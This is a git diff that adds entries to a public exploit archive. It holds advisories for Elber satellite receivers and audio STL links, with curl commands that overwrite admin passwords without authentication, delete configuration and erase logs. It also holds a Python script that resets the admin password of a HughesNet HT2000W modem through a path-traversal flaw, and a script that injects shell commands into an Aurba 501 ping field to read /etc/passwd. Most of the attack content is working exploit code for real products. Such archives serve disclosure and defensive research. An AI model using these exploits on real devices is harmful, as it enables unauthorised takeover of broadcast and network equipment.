diff --git a/exploits/hardware/webapps/52069.txt b/exploits/hardware/webapps/52069.txt new file mode 100644 index 000000000..a5d34ad7d --- /dev/null +++ b/exploits/hardware/webapps/52069.txt @@ -0,0 +1,68 @@ +Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: 1.5.179 Revision 904 + 1.5.56 Revision 884 + 1.229 Revision 440 + +Summary: ESE (Elber Satellite Equipment) product line, designed for the +high-end radio contribution and distribution market, where quality and +reliability are most important. The Elber IRD (Integrated Receiver Decoder) +ESE-01 offers a professional audio quality (and composite video) at an +excellent quality/price ratio. The development of digital satellite contribution +networks and the need to connect a large number of sites require a cheap +but reliable and performing satellite receiver with integrated decoder. + +Desc: The device suffers from an authentication bypass vulnerability through +a direct and unauthorized access to the password management functionality. The +issue allows attackers to bypass authentication by manipulating the set_pwd +endpoint that enables them to overwrite the password of any user within the +system. This grants unauthorized and administrative access to protected areas +of the application compromising the device's system security. + +-------------------------------------------------------------------------- +/modules/pwd.html +------------------ +50: function apply_pwd(level, pwd) +51: { +52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, +53: function(data){ +54: //$.alert({title:'Operation',text:data}); +55: show_message(data); +56: }).fail(function(error){ +57: show_message('Error ' + error.status, 'error'); +58: }); +59: } + +-------------------------------------------------------------------------- + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5820 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php + + +18.08.2023 + +-- + + +$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 + +Ref (lev param): + +Level 7 = SNMP Write Community (snmp_write_pwd) +Level 6 = SNMP Read Community (snmp_read_pwd) +Level 5 = Custom Password? hidden. (custom_pwd) +Level 4 = Display Password (display_pwd)? +Level 2 = Administrator Password (admin_pwd) +Level 1 = Super User Password (puser_pwd) +Level 0 = User Password (user_pwd) \ No newline at end of file diff --git a/exploits/hardware/webapps/52070.txt b/exploits/hardware/webapps/52070.txt new file mode 100644 index 000000000..fc941972e --- /dev/null +++ b/exploits/hardware/webapps/52070.txt @@ -0,0 +1,69 @@ +Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: 1.5.179 Revision 904 + 1.5.56 Revision 884 + 1.229 Revision 440 + +Summary: ESE (Elber Satellite Equipment) product line, designed for the +high-end radio contribution and distribution market, where quality and +reliability are most important. The Elber IRD (Integrated Receiver Decoder) +ESE-01 offers a professional audio quality (and composite video) at an +excellent quality/price ratio. The development of digital satellite contribution +networks and the need to connect a large number of sites require a cheap +but reliable and performing satellite receiver with integrated decoder. + +Desc: The device suffers from an unauthenticated device configuration and +client-side hidden functionality disclosure. + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5821 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php + + +18.08.2023 + +-- + + +# Config fan +$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' +Configuration applied + +# Delete config +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' +File delete successfully + +# Launch upgrade +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' +Upgrade launched Successfully + +# Log erase +$ curl 'http://TARGET/json_data/erase_log.js?until=-2' +Logs erased + +# Until: +# =0 ALL +# =-2 Yesterday +# =-8 Last week +# =-15 Last two weeks +# =-22 Last three weeks +# =-31 Last month + +# Set RX config +$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' +RX Config Applied Successfully + +# Show factory window and FPGA upload (Console) +> cleber_show_factory_wnd() + +# Etc. \ No newline at end of file diff --git a/exploits/hardware/webapps/52071.txt b/exploits/hardware/webapps/52071.txt new file mode 100644 index 000000000..0e0592543 --- /dev/null +++ b/exploits/hardware/webapps/52071.txt @@ -0,0 +1,70 @@ +Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) + Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) + +Summary: Wayber II is the name of an analogue/digital microwave link +able to transport a Mono or a MPX stereo signal from studio to audio +transmitter. Compact and reliable, it features very high quality and +modern technology both in signal processing and microwave section leading +to outstanding performances. + +Desc: The device suffers from an authentication bypass vulnerability through +a direct and unauthorized access to the password management functionality. The +issue allows attackers to bypass authentication by manipulating the set_pwd +endpoint that enables them to overwrite the password of any user within the +system. This grants unauthorized and administrative access to protected areas +of the application compromising the device's system security. + +-------------------------------------------------------------------------- +/modules/pwd.html +------------------ +50: function apply_pwd(level, pwd) +51: { +52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, +53: function(data){ +54: //$.alert({title:'Operation',text:data}); +55: show_message(data); +56: }).fail(function(error){ +57: show_message('Error ' + error.status, 'error'); +58: }); +59: } + +-------------------------------------------------------------------------- + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5822 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php + + +18.08.2023 + +-- + + +$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 + +Ref (lev param): + +Level 7 = SNMP Write Community (snmp_write_pwd) +Level 6 = SNMP Read Community (snmp_read_pwd) +Level 5 = Custom Password? hidden. (custom_pwd) +Level 4 = Display Password (display_pwd)? +Level 2 = Administrator Password (admin_pwd) +Level 1 = Super User Password (puser_pwd) +Level 0 = User Password (user_pwd) \ No newline at end of file diff --git a/exploits/hardware/webapps/52072.txt b/exploits/hardware/webapps/52072.txt new file mode 100644 index 000000000..866aa6cc6 --- /dev/null +++ b/exploits/hardware/webapps/52072.txt @@ -0,0 +1,71 @@ +Elber Wayber Analog/Digital Audio STL 4.00 Device Config + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) + Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) + +Summary: Wayber II is the name of an analogue/digital microwave link +able to transport a Mono or a MPX stereo signal from studio to audio +transmitter. Compact and reliable, it features very high quality and +modern technology both in signal processing and microwave section leading +to outstanding performances. + +Desc: The device suffers from an unauthenticated device configuration and +client-side hidden functionality disclosure. + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5823 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php + + +18.08.2023 + +-- + + +# Config fan +$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' +Configuration applied + +# Delete config +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' +File delete successfully + +# Launch upgrade +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' +Upgrade launched Successfully + +# Log erase +$ curl 'http://TARGET/json_data/erase_log.js?until=-2' +Logs erased + +# Until: +# =0 ALL +# =-2 Yesterday +# =-8 Last week +# =-15 Last two weeks +# =-22 Last three weeks +# =-31 Last month + +# Set RX config +$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' +RX Config Applied Successfully + +# Show factory window and FPGA upload (Console) +> cleber_show_factory_wnd() + +# Etc. \ No newline at end of file diff --git a/exploits/hardware/webapps/52073.py b/exploits/hardware/webapps/52073.py new file mode 100755 index 000000000..1c8d68c4d --- /dev/null +++ b/exploits/hardware/webapps/52073.py @@ -0,0 +1,96 @@ +# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset +# Date: 7/16/24 +# Exploit Author: Simon Greenblatt +# Vendor: HughesNet +# Version: Arcadyan httpd 1.0 +# Tested on: Linux +# CVE: CVE-2021-20090 + +import sys +import requests +import re +import base64 +import hashlib +import urllib + +red = "\033[0;41m" +green = "\033[1;34;42m" +reset = "\033[0m" + +def print_banner(): + print(green + ''' + _____________ _______________ _______________ ________ ____ _______________ _______ _______________ + \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ + / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ + \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ + \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / + \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset) + print(" Administrator password reset for HughesNet HT2000W Satellite Modem") + print(''' + Usage: python3 hughes_ht2000w_pass_reset.py + : The new administrator password + : The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n + This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset + the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as + improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''') + return None + +def get_httoken(ip_address): + # Make a GET request to system_p.htm using path traversal + r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm') + if r.status_code != 200: + print(red + f"(-) Failure: Could not request system_p.htm" + reset) + exit() + # Extract the httoken hidden in the DOM and convert it from Base64 + return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii') + +def encode_pass(password): + # Vigenere Cipher + key = "wg7005d" + enc_pass = "" + idx = 0 + for c in password: + enc_pass += str(ord(c) + ord(key[idx])) + "+" + idx = (idx + 1) % len(key) + return enc_pass + +def change_pass(ip_address, httoken, enc_pass): + # Create a POST request with the httoken and the encoded password + headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'} + payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass} + payload = urllib.parse.urlencode(payload, safe=':+') + try: + r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers) + except: + pass + return None + +def verify_pass(ip_address, new_pass): + # Make a GET request to cgi_sys_p.js to verify password + httoken = get_httoken(ip_address) + headers = {'Referer': f'http://{ip_address}/system_p.htm'} + r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers) + if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest(): + print(red + "(-) Failure: Could not verify the hash of the password" + reset) + exit() + +def main(): + if not (len(sys.argv) == 2 or len(sys.argv) == 3): + print_banner() + return + new_pass = sys.argv[1] + ip_address = "192.168.42.1" + if sys.argv == 3: + ip_address = sys.argv[2] + httoken = get_httoken(ip_address) + print(f"[+] Obtained httoken: {httoken}") + enc_pass = encode_pass(new_pass) + change_pass(ip_address, httoken, enc_pass) + print(f"[+] Password reset to: {new_pass}") + verify_pass(ip_address, new_pass) + print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest()) + print("[+] Password successfully changed!") + return + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/52074.py b/exploits/linux/webapps/52074.py new file mode 100755 index 000000000..1d52ed768 --- /dev/null +++ b/exploits/linux/webapps/52074.py @@ -0,0 +1,90 @@ +# Exploit Title: Remote Command Execution | Aurba 501 +# Date: 17-07-2024 +# Exploit Author: Hosein Vita +# Vendor Homepage: https://www.hpe.com +# Version: Aurba 501 CN12G5W0XX +# Tested on: Linux + +import requests +from requests.auth import HTTPBasicAuth + + +def get_input(prompt, default_value): + user_input = input(prompt) + return user_input if user_input else default_value + + +base_url = input("Enter the base URL: ") +if not base_url: + print("Base URL is required.") + exit(1) + +username = get_input("Enter the username (default: admin): ", "admin") +password = get_input("Enter the password (default: admin): ", "admin") + + +login_url = f"{base_url}/login.cgi" +login_payload = { + "username": username, + "password": password, + "login": "Login" +} + + +login_headers = { + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": base_url, + "Connection": "close" +} + +session = requests.Session() + + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Login to the system +response = session.post(login_url, headers=login_headers, data=login_payload, verify=False) + +# Check if login was successful +if response.status_code == 200 and "login failed" not in response.text.lower(): + print("Login successful!") + + # The command to be executed on the device + command = "cat /etc/passwd" + + + ping_ip = f"4.2.2.4||{command}" + + # Data to be sent in the POST request + data = { + "ping_ip": ping_ip, + "ping_timeout": "1", + "textareai": "", + "ping_start": "Ping" + } + + # Headers to be sent with the request + headers = { + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": base_url, + "Referer": f"{base_url}/admin.cgi?action=ping", + "Connection": "close" + } + + # Sending the HTTP POST request to exploit the vulnerability + exploit_url = f"{base_url}/admin.cgi?action=ping" + response = session.post(exploit_url, headers=headers, data=data, verify=False) + + + if any("root" in value for value in response.headers.values()): + print("Exploit successful! The /etc/passwd file contents are reflected in the headers:") + print(response.headers) + else: + print("Exploit failed. The response headers did not contain the expected output.") +else: + print("Login failed. Please check the credentials and try again.") + +# Print the response headers for further analysis +print(response.headers) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 046a34c11..ccc1d9e83 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -4372,10 +4372,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,, 52004,exploits/hardware/webapps/52004.txt,"Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, +52069,exploits/hardware/webapps/52069.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, +52070,exploits/hardware/webapps/52070.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, 52006,exploits/hardware/webapps/52006.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, 52007,exploits/hardware/webapps/52007.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, 52002,exploits/hardware/webapps/52002.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, 52003,exploits/hardware/webapps/52003.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, +52071,exploits/hardware/webapps/52071.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, +52072,exploits/hardware/webapps/52072.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, 51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, @@ -4516,6 +4520,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10276,exploits/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,webapps,hardware,,2009-12-02,,1,OSVDB-60666;CVE-2009-4197;OSVDB-60646;OSVDB-60645;OSVDB-60644;OSVDB-60643;OSVDB-60642;OSVDB-60641;OSVDB-60640;OSVDB-60639;CVE-2009-4196,,,,, 43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215,2018-01-01,2018-01-01,0,CVE-2017-17215,,,,,https://pastebin.com/4nzunPB5 45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,,2018-12-14,2018-12-14,0,CVE-2015-7254,,,,, +52073,exploits/hardware/webapps/52073.py,"HughesNet HT2000W Satellite Modem - Password Reset",2024-08-24,"Simon Greenblatt",webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, 42284,exploits/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,webapps,hardware,,2017-06-30,2017-06-30,0,,,,,, 42732,exploits/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,webapps,hardware,,2017-09-15,2017-10-03,0,CVE-2017-11435,,,,, 39951,exploits/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,webapps,hardware,80,2016-06-15,2016-06-15,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php @@ -8917,6 +8922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,,2018-12-03,2018-12-05,0,CVE-2018-8021,,,,http://www.exploit-db.comincubator-superset-0.22.0.tar.gz, 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,,2020-01-10,2020-01-10,0,,,,,, 20037,exploits/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,webapps,linux,,2012-07-23,2012-07-23,1,OSVDB-84397,,,,, +52074,exploits/linux/webapps/52074.py,"Aurba 501 - Authenticated RCE",2024-08-24,"Hosein Vita",webapps,linux,,2024-08-24,2024-08-24,0,,,,,, 21836,exploits/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload (Metasploit)",2012-10-10,Metasploit,webapps,linux,,2012-10-10,2012-10-10,1,OSVDB-85554,"Metasploit Framework (MSF)",,,, 40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80,2016-07-29,2016-07-29,0,CVE-2015-8257,,,,,http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,,2019-07-22,2019-07-22,0,,,,,,